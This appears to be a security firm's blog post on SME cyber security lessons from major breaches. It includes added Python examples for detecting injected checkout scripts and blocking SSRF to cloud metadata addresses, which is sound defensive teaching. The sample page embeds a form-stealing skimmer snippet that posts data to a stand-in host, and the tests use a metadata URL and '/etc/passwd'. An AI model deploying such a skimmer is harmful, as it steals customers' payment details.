Ayisha Bari
EasyJet, CapitalOne, British Airways and Marriott are all huge companies with equally large budgets. Another thing they have in common is they all fell victim to a serious data breach, costing them hundreds of millions of pounds. If the major players with a lot of resources to devote to cyber security still get hacked, do SMEs with limited budgets stand a chance? It’s a dramatic question, so let’s explore the answer.
Firstly, the four aforementioned breaches were different. CapitalOne was breached through a misconfigured web application firewall (WAF): a server-side request forgery relayed through the WAF reached the cloud instance metadata service, and the credentials it handed back were used to read customer data from cloud storage. British Airways fell victim to card skimming, in which a few lines of script injected into the payment page copy card details as the customer submits them. Whilst the exact details haven’t been explicitly released, the Marriott breach involved a Remote Access Trojan (RAT) and the presence of Mimikatz, a tool that dumps credentials from memory and can give attackers administrative access. How these got onto Marriott’s systems isn’t known, but there’s a good chance it’s down to phishing. As for the latest breach of the four (easyJet), details are still thin on the ground on what actually happened, but that hasn’t stopped them from facing an £18 billion class-action lawsuit.
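The British Airways-style skimmer described above is, in the end, a script on the page that shouldn’t be there, and that is something you can check for without any expensive tooling. The Python below is an added example, not code from the original post or from Bulletproof: it inventories every script on a checkout page and flags any external source whose host isn’t on an allowlist, and any inline script whose SHA-256 isn’t on a known-good list. The hostnames, the known-good inline script and the sample page are constructed for the example; in practice you would fetch the live page on a schedule and alert on any new finding.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts allowed to serve script to the checkout page (constructed for this example).
ALLOWED_SCRIPT_HOSTS = {"www.example-shop.test", "static.example-shop.test"}

# Inline scripts that are known good, kept as SHA-256 of the trimmed body so the
# allowlist never has to carry the script text itself (constructed example).
KNOWN_GOOD_INLINE = ["window.dataLayer = window.dataLayer || [];"]


def _sha256(text):
    return hashlib.sha256(text.strip().encode("utf-8")).hexdigest()


ALLOWED_INLINE_HASHES = {_sha256(s) for s in KNOWN_GOOD_INLINE}


class _ScriptCollector(HTMLParser):
    """Collects <script src=...> references and the bodies of inline <script> tags."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        # HTMLParser delivers script content through handle_data, possibly in chunks.
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def audit_scripts(html, page_host, allowed_hosts=ALLOWED_SCRIPT_HOSTS,
                  allowed_inline=ALLOWED_INLINE_HASHES):
    """Return a list of (finding, detail) for every script that is not on the allowlist."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        host = urlparse(src).hostname or page_host  # relative src is same-origin
        if host.lower() not in allowed_hosts:
            findings.append(("unexpected-external-script", src))
    for body in collector.inline:
        digest = _sha256(body)
        if digest not in allowed_inline:
            findings.append(("unexpected-inline-script", digest))
    return findings


# Constructed sample page: two legitimate scripts, one known-good inline snippet,
# plus an unexpected third-party script and an inline form-stealing snippet.
SAMPLE_CHECKOUT_PAGE = """<html><head>
<script src="/js/checkout.js"></script>
<script src="https://static.example-shop.test/lib/forms.min.js"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="//cdn.unknown-third-party.test/api.js"></script>
<script>
document.addEventListener('submit', function (e) {
  fetch('https://collector.unknown-third-party.test/', {method: 'POST',
        body: new URLSearchParams(new FormData(e.target))});
});
</script>
</head><body><form id="payment"></form></body></html>"""

if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_CHECKOUT_PAGE, "www.example-shop.test"):
        print(*finding)
```

This is the same idea as a Content Security Policy with script hashes, but run out of band, so it catches a change even where the CSP header hasn’t been deployed or has been weakened. It only sees what is in the served HTML: a script that is added at runtime by another script, or served from an allowed host that has itself been compromised, needs CSP or subresource integrity on top.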
It’s important to know these details, because each of these well-publicised breaches comes down to a failure of ‘best practice’. And, generally speaking, best practice doesn’t rely on expensive hardware or elite teams of cyber defenders; it’s about getting the basics right. So here’s our first lesson for SMEs: get the basics right, and you can find yourself more secure than a multinational corporation. To take the CapitalOne breach as an example, a routine penetration test could have revealed the WAF misconfiguration. Annual penetration tests are one of the bare minimum best practices for cyber security, which is why PCI DSS mandates them and ISO 27001 auditors expect them as evidence of vulnerability management.
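In the CapitalOne case, the misconfigured WAF was abused through server-side request forgery: a request relayed by the WAF reached the cloud instance metadata service on the link-local address 169.254.169.254 and came back with credentials. One of the basics that shuts that class of bug is refusing to let server-side code fetch loopback, private or link-local addresses at all. The Python below is an added example, not Bulletproof’s or CapitalOne’s code; the hostnames and the lookup table it resolves against are constructed so that it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Ranges a server-side fetcher must never reach: "this network", RFC 1918, carrier
# NAT, loopback and link-local (where cloud metadata services live, 169.254.169.254
# on AWS, Azure and GCP), plus the IPv6 equivalents.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]


def _system_resolver(host):
    """Resolve with the OS resolver; returns the set of address strings."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed lookup table so the example runs offline (assumption for this example).
EXAMPLE_DNS = {
    "www.example.test": ["203.0.113.10"],
    "metadata.internal.test": ["169.254.169.254"],
    "dual.internal.test": ["203.0.113.20", "10.0.0.5"],
}


def example_resolver(host):
    return EXAMPLE_DNS[host]


def check_fetch_target(url, resolver=_system_resolver):
    """Decide whether server-side code may fetch url.

    Returns (allowed, reason, resolved_ips). Connect to one of the returned IPs
    rather than re-resolving the name, otherwise a DNS rebinding attack can swap
    in 169.254.169.254 between this check and the actual fetch.
    """
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed", []
    host = parts.hostname
    if not host:
        return False, "no host in URL", []
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal IP, including [v6] forms
    except ValueError:
        try:
            addrs = set(resolver(host))  # a name, or an unusual spelling of an IP
        except (OSError, KeyError) as exc:
            return False, f"could not resolve {host}: {exc!r}", []
    for addr in sorted(addrs):
        ip = ipaddress.ip_address(addr)
        if ip.version == 6 and ip.ipv4_mapped:  # ::ffff:169.254.169.254
            ip = ip.ipv4_mapped
        if any(ip in net for net in BLOCKED_NETWORKS):
            # One blocked address is enough: a name that resolves to a public and a
            # private address is the classic way to slip past a naive check.
            return False, f"{host} resolves to blocked address {ip}", sorted(addrs)
    return True, "ok", sorted(addrs)


if __name__ == "__main__":
    for u in ("https://www.example.test/report.pdf",
              "http://169.254.169.254/latest/meta-data/",
              "http://[::ffff:169.254.169.254]/",
              "http://metadata.internal.test/",
              "http://dual.internal.test/",
              "file:///etc/passwd"):
        print(u, "->", check_fetch_target(u, example_resolver))
```

The check alone is not the whole fix: the WAF in the CapitalOne case also held cloud credentials with far broader permissions than it needed, so least privilege on the role behind any internet-facing component matters just as much as blocking the request.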
The fact is that cyber threats to businesses are many and varied. Hackers can compromise an organisation in a number of different ways: injecting their own scripts, exploiting outdated software, or even simple brute-forcing of passwords. And that’s to say nothing of phishing and social engineering. Securing a business network and protecting data in a modern, dynamic environment is no easy task. There’s a lot to consider and a lot that can be overlooked.
This makes the wish list for an organisation’s cyber defences look long and expensive. To secure a business, you ideally need:
Not only can this cost a lot of money, but it will also need a lot of specific expertise and take up a lot of staff time. However, things aren’t as bad as they seem. SMEs have an advantage in their smaller size. That’s our second SME lesson: start acting right now. In the case of compliance, getting processes in place and the right culture embedded now means your compliance (and, hopefully, your security) will grow naturally as your company expands. Cyber Essentials is the best first step to take here.
Likewise, if regular pen testing is always a part of your standard business practices, it’ll never become an obstruction to your growth. Even the high-ticket items such as 24/7 monitoring have options to make them affordable. Whilst the multinational enterprises will be building out their own SOCs, it makes much more sense for SMEs to take a managed option on a monthly retainer fee. All the service, all the expertise, none of the upfront cost.
You might think that the four well-known companies mentioned at the beginning are obvious targets. There’s more to be gained from hitting the big players, after all, right? So SMEs don’t need to worry because they’re not likely to be of interest to the hacking community, right? Wrong. Assuming you won’t be of interest to hackers is one of the surest ways to get breached, and recovering from that breach may cost more than your turnover, especially if you are hit with regulatory fines (such as for GDPR non-compliance).
This brings us to our third lesson for SMEs: understanding that companies are at risk of being breached regardless of size and service. The general rule is, the less time it takes to be hacked, the more profitable it is for a hacker. Opportunistic cyber criminals don’t care who you are, what you do, or how much (or little) data you have; an easy target is an easy target and will always be exploited. In fact, this is exactly how the NHS came to be crippled by WannaCry (also known as WannaCrypt) ransomware back in 2017: the worm wasn’t aimed at the NHS, it simply spread to any unpatched Windows machine it could reach over SMB, and the NHS had plenty of them.
It’s often noted by Bulletproof penetration testers that even companies with solid security at the perimeter can be vulnerable internally. This means a compromised account, or a malicious insider, could still do some serious damage. But what if the hacker’s inside agent didn’t know they were helping the hackers? Welcome to social engineering, and it’s one of the most important threats that SMEs need to be aware of.
Hackers are likely to opt for the path of least resistance. And in a lot of cases, this will be your staff. An unwitting member of staff who opens a malware-laden attachment or clicks a malicious link in a phishing email can undo all your security measures. And whilst many phishing emails are easy to spot because of bad spelling and grammar, and strange ‘from’ email addresses, there are other phishing emails that are much more finely crafted and targeted.
Here then is our last lesson for SMEs, and it’s simple, cheap and easy: train your staff. Helping them understand the dangers and their responsibility in protecting personal data will help ensure human error is kept to a minimum. Your staff can be your best line of cyber defence, or your worst threat. It’s up to you. Again, SME size and agility help: training is easier to schedule across a small team, and with online options it’s easier than ever to deliver.
The SME cyber security challenge is real, but so are the solutions. SMEs may think themselves outmanned and outgunned, but not investing in security can cost a lot more when you are hacked. Treating security as an afterthought puts your business in danger. And as this blog has shown, there are quick-wins available for even the smallest organisations. So for the skim readers and those who want a recap, here are Bulletproof’s top tips for SMEs to solve the security challenge:
Get the basics right. Pen test annually, run vulnerability scans monthly, and get Cyber Essentials certification (the UK Government-backed scheme).
Start now. The longer you wait, the harder it will be to integrate security as a business-as-usual practice. The sooner you act, the easier it will scale as your business grows.
Nobody is too small to be a target. Hackers don’t care who you are, only if you’re an easy target. Don’t make yourself one.
Train your staff. An unwitting staff member can undo all your hard work with a single click. Turn your greatest potential weakness into your greatest strength.
Joe is a blogger and security evangelist who’s been raising the profile of cyber security for a decade. He writes about a variety of cyber and compliance topics, with a keen eye on translating events and data into valuable customer insights. Never boring, sometimes controversial, always insightful.
We’ve developed a suite of best-in-class cyber security tools and free consultancy, all accessible from a single, easy-to-use platform to help you identify your company’s risks and protect your assets. If you’re interested in learning more, get in touch at contact@bulletproof.co.uk.